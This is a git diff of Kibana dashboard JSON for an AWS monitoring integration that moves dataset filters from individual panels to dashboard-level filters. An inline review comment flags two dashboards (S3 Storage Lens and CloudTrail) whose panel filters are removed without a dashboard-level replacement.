@@ -23,7 +45,7 @@ "attributes": { "description": "", "layerListJSON": "[{\"alpha\":1,\"id\":\"19047c4c-18d7-4aec-b0ce-98de2828244d\",\"label\":\"Hits\",\"maxZoom\":24,\"minZoom\":0,\"sourceDescriptor\":{\"isAutoSelect\":true,\"type\":\"EMS_TMS\",\"lightModeDefault\":\"road_map\"},\"style\":{},\"type\":\"EMS_VECTOR_TILE\",\"visible\":true},{\"alpha\":0.75,\"id\":\"1d457cd4-01be-4f96-95fd-af4ac535ebea\",\"label\":null,\"maxZoom\":24,\"minZoom\":0,\"sourceDescriptor\":{\"applyGlobalQuery\":true,\"geoField\":\"source.geo.location\",\"id\":\"1e82f50f-424a-4718-905b-ad45db14db62\",\"requestType\":\"point\",\"resolution\":\"COARSE\",\"type\":\"ES_GEO_GRID\",\"indexPatternRefName\":\"layer_1_source_index_pattern\"},\"style\":{\"properties\":{\"fillColor\":{\"options\":{\"color\":\"Blues\",\"field\":{\"label\":\"count\",\"name\":\"doc_count\",\"origin\":\"source\"},\"fieldMetaOptions\":{\"isEnabled\":false,\"sigma\":3}},\"type\":\"DYNAMIC\"},\"icon\":{\"type\":\"STATIC\",\"options\":{\"value\":\"marker\"}},\"iconOrientation\":{\"options\":{\"orientation\":0},\"type\":\"STATIC\"},\"iconSize\":{\"options\":{\"field\":{\"label\":\"count\",\"name\":\"doc_count\",\"origin\":\"source\"},\"fieldMetaOptions\":{\"isEnabled\":false,\"sigma\":3},\"maxSize\":32,\"minSize\":4},\"type\":\"DYNAMIC\"},\"lineColor\":{\"options\":{\"color\":\"#167a6d\"},\"type\":\"STATIC\"},\"lineWidth\":{\"options\":{\"size\":1},\"type\":\"STATIC\"},\"symbolizeAs\":{\"options\":{\"value\":\"circle\"}}},\"type\":\"VECTOR\"},\"type\":\"GEOJSON_VECTOR\",\"visible\":true}]", - "mapStateJSON": 
"{\"center\":{\"lat\":50.97903,\"lon\":13.666},\"filters\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"index\":\"logs-*\",\"key\":\"data_stream.dataset\",\"negate\":false,\"params\":{\"query\":\"aws.elb_logs\"},\"type\":\"phrase\",\"value\":\"elb\"},\"query\":{\"match\":{\"data_stream.dataset\":{\"query\":\"aws.elb_logs\",\"type\":\"phrase\"}}}}],\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"refreshConfig\":{\"interval\":0,\"isPaused\":false},\"timeFilters\":{\"from\":\"now-15m\",\"to\":\"now\"},\"zoom\":3.9,\"settings\":{\"autoFitToDataBounds\":false}}", + "mapStateJSON": "{\"center\":{\"lat\":50.97903,\"lon\":13.666},\"filters\":[],\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"refreshConfig\":{\"interval\":0,\"isPaused\":false},\"timeFilters\":{\"from\":\"now-15m\",\"to\":\"now\"},\"zoom\":3.9,\"settings\":{\"autoFitToDataBounds\":false}}", "title": "ELB Requests Geolocation [Logs AWS]", "uiStateJSON": "{\"isLayerTOCOpen\":true,\"openTOCDetails\":[]}" }, diff --git a/packages/aws/kibana/dashboard/aws-4746e000-bacd-11e9-9f70-1f7bda85a5eb.json b/packages/aws/kibana/dashboard/aws-4746e000-bacd-11e9-9f70-1f7bda85a5eb.json index 4fe55589e443..8925c057c5f5 100644 --- a/packages/aws/kibana/dashboard/aws-4746e000-bacd-11e9-9f70-1f7bda85a5eb.json +++ b/packages/aws/kibana/dashboard/aws-4746e000-bacd-11e9-9f70-1f7bda85a5eb.json @@ -3,7 +3,29 @@ "description": "Logs AWS S3 Server Access Log Overview Dashboard", "kibanaSavedObjectMeta": { "searchSourceJSON": { - "filter": [], + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "aws.s3access" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "aws.s3access" + } + } + } + ], "query": { "language": "kuery", "query": "" 
diff --git a/packages/aws/kibana/dashboard/aws-5465f0f0-26e4-11ee-9051-011d57d86fe2.json b/packages/aws/kibana/dashboard/aws-5465f0f0-26e4-11ee-9051-011d57d86fe2.json index 6af83312e607..dcff494a409f 100644 --- a/packages/aws/kibana/dashboard/aws-5465f0f0-26e4-11ee-9051-011d57d86fe2.json +++ b/packages/aws/kibana/dashboard/aws-5465f0f0-26e4-11ee-9051-011d57d86fe2.json @@ -8,7 +8,35 @@ "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}" }, "kibanaSavedObjectMeta": { - "searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[{\"meta\":{\"disabled\":false,\"negate\":false,\"alias\":null,\"key\":\"data_stream.dataset\",\"field\":\"data_stream.dataset\",\"params\":{\"query\":\"aws.apigateway_logs\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"data_stream.dataset\":\"aws.apigateway_logs\"}},\"$state\":{\"store\":\"appState\"}}]}" + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "aws.apigateway_logs" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "aws.apigateway_logs" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } }, "optionsJSON": { "hidePanelTitles": false, diff --git a/packages/aws/kibana/dashboard/aws-80ed1380-41a6-11ec-a605-bff67d9b7872.json b/packages/aws/kibana/dashboard/aws-80ed1380-41a6-11ec-a605-bff67d9b7872.json index c06f858c2a94..01f79837ceb1 100644 --- a/packages/aws/kibana/dashboard/aws-80ed1380-41a6-11ec-a605-bff67d9b7872.json +++ b/packages/aws/kibana/dashboard/aws-80ed1380-41a6-11ec-a605-bff67d9b7872.json 
@@ -1299,29 +1299,7 @@ } } }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "filter-index-pattern-0", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "aws.s3_storage_lens" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "aws.s3_storage_lens" - } - } - } - ], + "filters": [], "query": { "language": "kuery", "query": "" @@ -1646,29 +1624,7 @@ } } }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "filter-index-pattern-0", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "aws.s3_storage_lens" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "aws.s3_storage_lens" - } - } - } - ], + "filters": [], "query": { "language": "kuery", "query": "" diff --git a/packages/aws/kibana/dashboard/aws-8fcf4c20-f7a3-11ec-aa7f-c173c0f9e267.json b/packages/aws/kibana/dashboard/aws-8fcf4c20-f7a3-11ec-aa7f-c173c0f9e267.json index b680661a5f97..305a665d1609 100644 --- a/packages/aws/kibana/dashboard/aws-8fcf4c20-f7a3-11ec-aa7f-c173c0f9e267.json +++ b/packages/aws/kibana/dashboard/aws-8fcf4c20-f7a3-11ec-aa7f-c173c0f9e267.json @@ -4,10 +4,32 @@ "hits": 0, "kibanaSavedObjectMeta": { "searchSourceJSON": { - "filter": [], + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "aws.securityhub_findings" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "aws.securityhub_findings" + } + } + } + ], "query": { "language": "kuery", - "query": "data_stream.dataset : \"aws.securityhub_findings\"" + "query": "" } } }, 
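Review bot: Both `"filters": []` changes in `aws-80ed1380-41a6-11ec-a605-bff67d9b7872.json` remove the panels' `data_stream.dataset` phrase filter for `aws.s3_storage_lens`, and no hunk shown for this file adds a matching entry under `kibanaSavedObjectMeta.searchSourceJSON.filter`, unlike the ELB, S3 access, EMR and EC2 dashboards in this commit. The six `aws.cloudtrail` panel filters removed in `aws-9c09cd20-7399-11ea-a345-f985c61fe654.json` are in the same position. Unless these two dashboards already carry a dashboard-level dataset filter in lines the diff does not show, their panels would aggregate every dataset behind the data view, and CloudTrail counts read during an investigation would include unrelated events. Either confirm that filter exists or add one in the form used elsewhere in the commit, with `"query": "aws.s3_storage_lens"` and `"query": "aws.cloudtrail"` respectively.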
diff --git a/packages/aws/kibana/dashboard/aws-98f85120-0ea4-11ee-9c37-e55025c0278a.json b/packages/aws/kibana/dashboard/aws-98f85120-0ea4-11ee-9c37-e55025c0278a.json index fcc4515d1a49..9f9f90eaefb0 100644 --- a/packages/aws/kibana/dashboard/aws-98f85120-0ea4-11ee-9c37-e55025c0278a.json +++ b/packages/aws/kibana/dashboard/aws-98f85120-0ea4-11ee-9c37-e55025c0278a.json @@ -9,7 +9,29 @@ "description": "Overview of AWS EMR Metrics", "kibanaSavedObjectMeta": { "searchSourceJSON": { - "filter": [], + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "aws.emr_metrics" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "aws.emr_metrics" + } + } + } + ], "query": { "language": "kuery", "query": "" diff --git a/packages/aws/kibana/dashboard/aws-9c09cd20-7399-11ea-a345-f985c61fe654.json b/packages/aws/kibana/dashboard/aws-9c09cd20-7399-11ea-a345-f985c61fe654.json index 99bace034433..4be514fc6d9e 100644 --- a/packages/aws/kibana/dashboard/aws-9c09cd20-7399-11ea-a345-f985c61fe654.json +++ b/packages/aws/kibana/dashboard/aws-9c09cd20-7399-11ea-a345-f985c61fe654.json @@ -158,29 +158,7 @@ "layers": {} } }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "ac6db275-2ddb-41f1-b203-c8fab3ca7e72", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "aws.cloudtrail" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "aws.cloudtrail" - } - } - } - ], + "filters": [], "internalReferences": [], "query": { "language": "kuery", 
@@ -375,29 +353,7 @@ "layers": {} } }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "67c166a6-891b-47b5-a916-28eb114c129b", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "aws.cloudtrail" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "aws.cloudtrail" - } - } - } - ], + "filters": [], "internalReferences": [], "query": { "language": "kuery", @@ -529,29 +485,7 @@ "layers": {} } }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "df9eca25-d687-47e3-a729-395cdce4b952", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "aws.cloudtrail" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "aws.cloudtrail" - } - } - } - ], + "filters": [], "internalReferences": [], "query": { "language": "kuery", @@ -681,29 +615,7 @@ "layers": {} } }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "36383587-6745-42e7-be57-db8876de435e", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "aws.cloudtrail" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "aws.cloudtrail" - } - } - } - ], + "filters": [], "internalReferences": [], "query": { "language": "kuery", @@ -833,29 +745,7 @@ "layers": {} } }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "15d4ec78-9b38-428a-a871-c2a8c5849d30", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "aws.cloudtrail" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "aws.cloudtrail" - } - } - } - ], + "filters": [], "internalReferences": [], "query": { "language": "kuery", 
@@ -1001,29 +891,7 @@ "layers": {} } }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "0c6c1e85-98f6-499c-a84a-b9056ee6387b", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "aws.cloudtrail" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "aws.cloudtrail" - } - } - } - ], + "filters": [], "internalReferences": [], "query": { "language": "kuery", diff --git a/packages/aws/kibana/dashboard/aws-a096b830-4762-11e9-8062-c98a86cb6f94.json b/packages/aws/kibana/dashboard/aws-a096b830-4762-11e9-8062-c98a86cb6f94.json index c74617321d0d..5967e4b51e2d 100644 --- a/packages/aws/kibana/dashboard/aws-a096b830-4762-11e9-8062-c98a86cb6f94.json +++ b/packages/aws/kibana/dashboard/aws-a096b830-4762-11e9-8062-c98a86cb6f94.json @@ -10,7 +10,48 @@ "hits": 0, "kibanaSavedObjectMeta": { "searchSourceJSON": { - "filter": [], + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "aws.s3_daily_storage", + "aws.s3_request", + "aws.s3_storage_lens" + ], + "type": "phrases" + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "aws.s3_daily_storage" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.s3_request" + } + }, + { + "match_phrase": { + "data_stream.dataset": "aws.s3_storage_lens" + } + } + ] + } + } + } + ], "query": { "language": "kuery", "query": "" diff --git a/packages/aws/kibana/dashboard/aws-aed17a80-56d9-11ee-893f-c96e4c6c871e.json b/packages/aws/kibana/dashboard/aws-aed17a80-56d9-11ee-893f-c96e4c6c871e.json index 2d9223aeb009..7d74a34a8c84 100644 --- a/packages/aws/kibana/dashboard/aws-aed17a80-56d9-11ee-893f-c96e4c6c871e.json 
+++ b/packages/aws/kibana/dashboard/aws-aed17a80-56d9-11ee-893f-c96e4c6c871e.json 
@@ -2003,62 +2003,62 @@ "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern", "id": "metrics-*" - }, - { + }, + { "name": "9db00c20-491e-44e9-8e52-9bb7f60ac7ce:indexpattern-datasource-layer-e60d1b84-415e-4754-86f0-96074ef1cde1", "id": "metrics-*", "type": "index-pattern" - }, - { + }, + { "name": "d8a799fc-c724-4dcf-8724-2d0c3e3bb153:indexpattern-datasource-layer-a559bd73-35ec-477a-8752-2c2cfb51f8d9", "id": "metrics-*", "type": "index-pattern" - }, - { + }, + { "type": "index-pattern", "id": "metrics-*", "name": "325613ee-eabb-45e4-af99-81f54b11af15:indexpattern-datasource-layer-2cfef95f-fa80-4a29-b211-9874dba1c2bb" - }, - { + }, + { "type": "index-pattern", "id": "metrics-*", "name": "41a4b2d0-35d8-4306-9d63-51916db9b913:indexpattern-datasource-layer-2cfef95f-fa80-4a29-b211-9874dba1c2bb" - }, - { + }, + { "name": "3d0f29c6-bb4b-42e4-9453-5c8af99d0b60:indexpattern-datasource-layer-2cfef95f-fa80-4a29-b211-9874dba1c2bb", "id": "metrics-*", "type": "index-pattern" - }, - { + }, + { "type": "index-pattern", "id": "metrics-*", "name": "5ca66947-bafc-4e89-a245-bbb3967281c6:indexpattern-datasource-layer-2cfef95f-fa80-4a29-b211-9874dba1c2bb" - }, - { + }, + { "type": "index-pattern", "id": "metrics-*", "name": "0aab01fe-67f3-4f6e-9323-c07192dd1bd2:indexpattern-datasource-layer-8e802b8a-241a-42a9-b6fe-64d720488b94" - }, - { + }, + { "type": "index-pattern", "id": "metrics-*", "name": "ff904fbb-5539-495f-a7cd-ea1115b76c70:indexpattern-datasource-layer-2cfef95f-fa80-4a29-b211-9874dba1c2bb" - }, - { + }, + { "name": "controlGroup_6ea93fab-4b92-4842-b642-73904edf5146:optionsListDataView", "type": "index-pattern", "id": "metrics-*" - }, - { + }, + { "name": "controlGroup_9beedf6d-2ccc-44f0-ba7a-fb632655a7c2:optionsListDataView", "type": "index-pattern", "id": "metrics-*" - }, - { + }, + { "name": "controlGroup_358aee6c-253a-46a7-9b12-1aa54b026157:optionsListDataView", "type": "index-pattern", "id": "metrics-*" - } + } ], "type": 
"dashboard" } \ No newline at end of file diff --git a/packages/aws/kibana/dashboard/aws-c5846400-f7fb-11e8-af03-c999c9dea608.json b/packages/aws/kibana/dashboard/aws-c5846400-f7fb-11e8-af03-c999c9dea608.json index f06105b7103d..170c8091bde9 100644 --- a/packages/aws/kibana/dashboard/aws-c5846400-f7fb-11e8-af03-c999c9dea608.json +++ b/packages/aws/kibana/dashboard/aws-c5846400-f7fb-11e8-af03-c999c9dea608.json @@ -9,7 +9,29 @@ "description": "Overview of AWS EC2 Metrics", "kibanaSavedObjectMeta": { "searchSourceJSON": { - "filter": [], + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "aws.ec2_metrics" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "aws.ec2_metrics" + } + } + } + ], "query": { "language": "kuery", "query": "" diff --git a/packages/aws/kibana/dashboard/aws-cc571400-dc61-11ec-a6e3-1bc5ab0aa1b4.json b/packages/aws/kibana/dashboard/aws-cc571400-dc61-11ec-a6e3-1bc5ab0aa1b4.json index 37a0d1f9fc7a..b36161b2124d 100644 --- a/packages/aws/kibana/dashboard/aws-cc571400-dc61-11ec-a6e3-1bc5ab0aa1b4.json +++ b/packages/aws/kibana/dashboard/aws-cc571400-dc61-11ec-a6e3-1bc5ab0aa1b4.json 
@@ -4,10 +4,45 @@
 "hits": 0,
 "kibanaSavedObjectMeta": {
 "searchSourceJSON": {
- "filter": [],
+ "filter": [
+ {
+ "$state": {
+ "store": "appState"
+ },
+ "meta": {
+ "alias": null,
+ "disabled": false,
+ "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index",
+ "key": "data_stream.dataset",
+ "negate": false,
+ "params": [
+ "aws.securityhub_findings",
+ "aws.securityhub_insights"
+ ],
+ "type": "phrases"
+ },
+ "query": {
+ "bool": {
+ "minimum_should_match": 1,
+ "should": [
+ {
+ "match_phrase": {
+ "data_stream.dataset": "aws.securityhub_findings"
+ }
+ },
+ {
+ "match_phrase": {
+ "data_stream.dataset": "aws.securityhub_insights"
+ }
+ }
+ ]
+ }
+ }
+ }
+ ],
 "query": {
 "language": "kuery",
- "query": "data_stream.dataset : \"aws.securityhub_findings\" or data_stream.dataset : \"aws.securityhub_insights\""
+ "query": ""
 }
 }
 },
diff --git a/packages/aws/kibana/dashboard/aws-df91e7f0-56d8-11ee-893f-c96e4c6c871e.json b/packages/aws/kibana/dashboard/aws-df91e7f0-56d8-11ee-893f-c96e4c6c871e.json
index 3bbffa9f77b7..46f4e29ed89c 100644
--- a/packages/aws/kibana/dashboard/aws-df91e7f0-56d8-11ee-893f-c96e4c6c871e.json
+++ b/packages/aws/kibana/dashboard/aws-df91e7f0-56d8-11ee-893f-c96e4c6c871e.json
@@ -47,1939 +47,1939 @@ "useMargins": true }, "panelsJSON": [ - { - "version": "8.9.0", - "type": "visualization", - "gridData": { - "h": 7, - "i": "2c33770b-e7d0-4979-a4d5-3e0cc462f083", - "w": 24, - "x": 0, - "y": 0 - }, - "panelIndex": "2c33770b-e7d0-4979-a4d5-3e0cc462f083", - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "fontSize": 13, - "markdown": "Navigation \n \n[REST Dashboard](#/dashboard/aws-bff88770-56d6-11ee-893f-c96e4c6c871e) | __[HTTP Dashboard](#/dashboard/aws-df91e7f0-56d8-11ee-893f-c96e4c6c871e)__ | [WebSocket Dashboard](#/dashboard/aws-aed17a80-56d9-11ee-893f-c96e4c6c871e)\n\nThis dashboard provides Stage level metrics for HTTP APIs deployed through AWS API Gateway.", - "openLinksInNewTab": true - }, - "title": "", - "type": "markdown", - "uiState": {} - } - } + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 7, + "i": "2c33770b-e7d0-4979-a4d5-3e0cc462f083", + "w": 24, + "x": 0, + "y": 0 }, - { - "version": "8.9.0", - "type": "lens", - "gridData": { - "h": 7, - "i": "7c57d40d-fc76-48d5-a436-55a498d56910", - "w": 12, - "x": 24, - "y": 0 - }, - "panelIndex": "7c57d40d-fc76-48d5-a436-55a498d56910", - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "name": "indexpattern-datasource-layer-14e551f8-dfa7-437b-ac75-0e196533af38", - "id": "metrics-*", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "14e551f8-dfa7-437b-ac75-0e196533af38": { - "columnOrder": [ - "9c3f1290-a36a-452e-9beb-ead1fb42ce38" - ], - "columns": { - "9c3f1290-a36a-452e-9beb-ead1fb42ce38": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "aws.dimensions.ApiId : * and aws.dimensions.Stage : * and 
NOT aws.dimensions.Method : * and NOT aws.dimensions.Resource : * and NOT aws.dimensions.Route: * " - }, - "isBucketed": false, - "label": "Total Count", - "operationType": "sum", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "aws.apigateway.metrics.Count.sum" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - } - }, - "filters": [], - "internalReferences": [], + "panelIndex": "2c33770b-e7d0-4979-a4d5-3e0cc462f083", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], "query": { "language": "kuery", "query": "" - }, - "visualization": { - "layerId": "14e551f8-dfa7-437b-ac75-0e196533af38", - "layerType": "data", - "metricAccessor": "9c3f1290-a36a-452e-9beb-ead1fb42ce38" } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + } + }, + "description": "", + "params": { + "fontSize": 13, + "markdown": "Navigation \n \n[REST Dashboard](#/dashboard/aws-bff88770-56d6-11ee-893f-c96e4c6c871e) | __[HTTP Dashboard](#/dashboard/aws-df91e7f0-56d8-11ee-893f-c96e4c6c871e)__ | [WebSocket Dashboard](#/dashboard/aws-aed17a80-56d9-11ee-893f-c96e4c6c871e)\n\nThis dashboard provides Stage level metrics for HTTP APIs deployed through AWS API Gateway.", + "openLinksInNewTab": true }, - "enhancements": {} + "title": "", + "type": "markdown", + "uiState": {} } + } + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 7, + "i": "7c57d40d-fc76-48d5-a436-55a498d56910", + "w": 12, + "x": 24, + "y": 0 }, - { - "version": "8.9.0", - "type": "lens", - "gridData": { - "h": 7, - "i": "d5eaca19-1beb-4a9b-a357-883fa8890cdf", - "w": 12, - "x": 36, - "y": 0 - }, - "panelIndex": "d5eaca19-1beb-4a9b-a357-883fa8890cdf", - "embeddableConfig": { - "attributes": { - "title": "", - "description": "", - "visualizationType": "lnsMetric", - "type": "lens", - "references": [ - { - "type": "index-pattern", - "id": "metrics-*", - "name": 
"indexpattern-datasource-layer-14d15e2d-7223-4aae-90e7-0ad8c4ebc71a" - } - ], - "state": { - "visualization": { - "layerId": "14d15e2d-7223-4aae-90e7-0ad8c4ebc71a", - "layerType": "data", - "metricAccessor": "3db90e65-15bf-48a8-b430-018274aa341d" - }, - "query": { - "language": "kuery", - "query": "" - }, - "filters": [], - "datasourceStates": { - "formBased": { - "layers": { - "14d15e2d-7223-4aae-90e7-0ad8c4ebc71a": { - "columnOrder": [ - "3db90e65-15bf-48a8-b430-018274aa341d" - ], - "columns": { - "3db90e65-15bf-48a8-b430-018274aa341d": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "aws.dimensions.ApiId : * and aws.dimensions.Stage : * and NOT aws.dimensions.Method : * and NOT aws.dimensions.Resource : * and NOT aws.dimensions.Route: * " - }, - "isBucketed": false, - "label": "Total Average Latency", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 2, - "compact": true, - "suffix": "ms" - } - } - }, - "scale": "ratio", - "sourceField": "aws.apigateway.metrics.Latency.avg" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } + "panelIndex": "7c57d40d-fc76-48d5-a436-55a498d56910", + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "name": "indexpattern-datasource-layer-14e551f8-dfa7-437b-ac75-0e196533af38", + "id": "metrics-*", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "14e551f8-dfa7-437b-ac75-0e196533af38": { + "columnOrder": [ + "9c3f1290-a36a-452e-9beb-ead1fb42ce38" + ], + "columns": { + "9c3f1290-a36a-452e-9beb-ead1fb42ce38": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "aws.dimensions.ApiId : * and aws.dimensions.Stage : * and NOT aws.dimensions.Method : * and NOT aws.dimensions.Resource : * and NOT aws.dimensions.Route: * " + }, + "isBucketed": false, + 
"label": "Total Count", + "operationType": "sum", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "aws.apigateway.metrics.Count.sum" + } + }, + "incompleteColumns": {}, + "sampling": 1 } } - }, - "internalReferences": [], - "adHocDataViews": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "14e551f8-dfa7-437b-ac75-0e196533af38", + "layerType": "data", + "metricAccessor": "9c3f1290-a36a-452e-9beb-ead1fb42ce38" } }, - "enhancements": {} - } - }, - { - "version": "8.9.0", - "type": "lens", - "gridData": { - "h": 15, - "i": "767af9d0-2434-4b2e-9fbc-e0dba1c293ae", - "w": 24, - "x": 0, - "y": 7 + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" }, - "panelIndex": "767af9d0-2434-4b2e-9fbc-e0dba1c293ae", - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "name": "indexpattern-datasource-layer-ff2c6fd1-df0b-409d-a7e7-033a129edba3", - "id": "metrics-*", - "type": "index-pattern" + "enhancements": {} + } + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 7, + "i": "d5eaca19-1beb-4a9b-a357-883fa8890cdf", + "w": 12, + "x": 36, + "y": 0 + }, + "panelIndex": "d5eaca19-1beb-4a9b-a357-883fa8890cdf", + "embeddableConfig": { + "attributes": { + "title": "", + "description": "", + "visualizationType": "lnsMetric", + "type": "lens", + "references": [ + { + "type": "index-pattern", + "id": "metrics-*", + "name": "indexpattern-datasource-layer-14d15e2d-7223-4aae-90e7-0ad8c4ebc71a" + } + ], + "state": { + "visualization": { + "layerId": "14d15e2d-7223-4aae-90e7-0ad8c4ebc71a", + "layerType": "data", + "metricAccessor": "3db90e65-15bf-48a8-b430-018274aa341d" + }, + "query": { + "language": "kuery", + "query": "" + }, + "filters": [], + "datasourceStates": { + "formBased": { + "layers": { + "14d15e2d-7223-4aae-90e7-0ad8c4ebc71a": { + "columnOrder": [ + "3db90e65-15bf-48a8-b430-018274aa341d" + 
], + "columns": { + "3db90e65-15bf-48a8-b430-018274aa341d": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "aws.dimensions.ApiId : * and aws.dimensions.Stage : * and NOT aws.dimensions.Method : * and NOT aws.dimensions.Resource : * and NOT aws.dimensions.Route: * " + }, + "isBucketed": false, + "label": "Total Average Latency", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 2, + "compact": true, + "suffix": "ms" + } + } + }, + "scale": "ratio", + "sourceField": "aws.apigateway.metrics.Latency.avg" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "ff2c6fd1-df0b-409d-a7e7-033a129edba3": { - "columnOrder": [ - "f87d2d15-ecd3-4cf3-85e5-911976418f35", - "21bcc448-3bbc-4949-8471-40e126445935", - "11242c77-c1e8-482f-a8ab-d14342367450" - ], - "columns": { - "11242c77-c1e8-482f-a8ab-d14342367450": { - "dataType": "number", - "isBucketed": false, - "label": "Sum of aws.apigateway.metrics.Count.sum", - "operationType": "sum", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 0 - } + }, + "internalReferences": [], + "adHocDataViews": {} + } + }, + "enhancements": {} + } + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "767af9d0-2434-4b2e-9fbc-e0dba1c293ae", + "w": 24, + "x": 0, + "y": 7 + }, + "panelIndex": "767af9d0-2434-4b2e-9fbc-e0dba1c293ae", + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "name": 